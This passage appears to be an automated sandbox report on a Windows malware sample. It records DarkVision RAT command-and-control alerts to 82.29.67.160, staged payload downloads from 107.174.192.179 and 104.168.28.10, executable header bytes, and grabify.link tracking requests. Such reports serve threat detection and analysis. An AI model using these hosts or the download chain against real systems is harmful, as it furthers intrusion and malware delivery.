                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbz source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: _prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBw source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Rprod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.0000000000520000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; Code function: 0_2_00410B94 __snwprintf,FindFirstFileW,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_00410B94
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDA97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_000001C3DDDA97F0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_009135CC FindFirstFileA,FindNextFileA,FindClose,8_2_009135CC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_00931C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,8_2_00931C54

                    Networking

                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49688 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49690 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49692 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49693 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49726 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49747 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49779 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49780 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49781 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49790 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49791 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49789 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49788 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49782 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49787 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49794 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49793 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49801 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49804 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49809 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49813 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49805 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49802 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49810 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49807 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49820 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49803 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49819 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49830 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49815 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49812 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49825 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49808 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49822 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49832 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49831 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49797 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49823 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49784 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49783 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49817 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49800 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49811 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49826 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49833 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49824 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49816 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49806 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49829 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49818 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49828 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49792 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49799 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49778 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49785 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49798 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49796 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49821 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49814 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49795 -> 82.29.67.160:443
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49827 -> 82.29.67.160:443
                    Source: Malware configuration extractor | IPs: 82.29.67.160
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | File created: 303465c5.exe.11.dr
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 04 Apr 2025 06:44:15 GMTContent-Type: application/octet-streamContent-Length: 1975808Last-Modified: Wed, 02 Apr 2025 13:30:10 GMTConnection: keep-aliveETag: "67ed3be2-1e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 14 fa ce 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 ba 00 00 00 68 19 00 00 00 00 00 75 3b 40 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 50 43 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 48 3f 00 3c 00 00 00 00 e0 42 00 46 6b 00 00 60 a2 42 00 90 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 25 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 b9 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 2a 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 ba 18 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c8 07 00 00 00 c0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 73 30 00 00 00 00 00 a7 
3d 0b 00 00 d0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 73 31 00 00 00 00 00 50 00 00 00 00 10 25 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 73 32 00 00 00 00 00 f0 b2 1d 00 00 20 25 00 00 b4 1d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 46 6b 00 00 00 e0 42 00 00 6c 00 00 00 ba 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 04 Apr 2025 06:44:23 GMTContent-Type: application/octet-streamContent-Length: 1400832Last-Modified: Sat, 22 Mar 2025 01:09:32 GMTConnection: keep-aliveETag: "67de0dcc-156000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 bc 0b de 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 3a 07 00 00 ca 01 00 00 00 00 00 41 3f 2a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 2b 00 00 04 00 00 5f c9 15 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 b9 24 00 a0 00 00 00 00 c0 2b 00 b2 01 00 00 a0 4f 2b 00 bc 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 38 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 52 01 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 6d 00 00 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f4 3e 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 30 30 00 00 00 00 00 68 
ee 0c 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 30 31 00 00 00 00 00 a0 00 00 00 00 50 16 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 30 32 00 00 00 00 00 5c 57 15 00 00 60 16 00 00 58 15 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 b2 01 00 00 00 c0 2b 00 00 02 00 00 00 5e 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox View | IP Address: 4.28.136.57
                    Source: Joe Sandbox View | IP Address: 104.26.8.202
                    Source: Joe Sandbox View | IP Address: 107.174.192.179
                    Source: Joe Sandbox View | ASN Name: NTLGB
                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49689 -> 104.26.8.202:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49691 -> 104.26.8.202:443
                    Source: global traffic | HTTP traffic detected: GET /ZATFQO HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: grabify.link
                    Source: global traffic | HTTP traffic detected: GET /images/pixel.png HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: grabify.link | Cookie: g_session=eyJpdiI6IkY2WEtLTU1vWVhUSUp6VVdjTzkwd0E9PSIsInZhbHVlIjoia01wOWxMK2ZrTXh0RUoxZ1VJWjdPMGI5VkVMMm5MUlM3b2pRdmpnRlFSUDJCSnh4bUtnakx5dTBRVmZiMDdMZldEYVFvOXNPUWpZMnFUUU5zeEZDeEdtY1g2NFY3cmUvTnV0WVNrTzRESmd2VkJEZ24yVmc0b05USllyNjVmbkciLCJtYWMiOiI2ZGM4MjczNjczZDNlNThkNTI3NjI1YzM3ZTQwZGIxMjRjM2I0OGJkYjBjZDBlYTE1NjVkZTEzZDgwZDI1NWE2IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6ImZHMC9uUEtPdXFMaVRMTS9qN0ZEMnc9PSIsInZhbHVlIjoiMlFNaFhBcEYyMitWNmVXNlpFdEdKQVFvWnJPZXE0R1pCbnlFdC92dzJCaGVnQnMxdUo5ZWQ4Z1Ewd25DeUppaWNUWnJNOHRzalRpc3ZucWJUQjU0Z2dmWlBobUZqZnl1K3VvdGNkRFdNeW1wcTdhdUx4N3YySVBBSHI5WTRGWWYiLCJtYWMiOiJiYmQzM2IyMWI1ZGE0OWNhYTJkMGU4YjY2MzZmYmQ2YmRjZTViMGJjOTlkOGM1NDVjN2I1ZTcxMmJkMzMzNDQ2IiwidGFnIjoiIn0%3D
                    Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /data/003 HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: 107.174.192.179
                    Source: global traffic | HTTP traffic detected: GET /clean HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: 107.174.192.179
                    Source: global traffic | HTTP traffic detected: HEAD /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=16384-32767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=32768-49151 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=49152-65535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=98304-114687 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
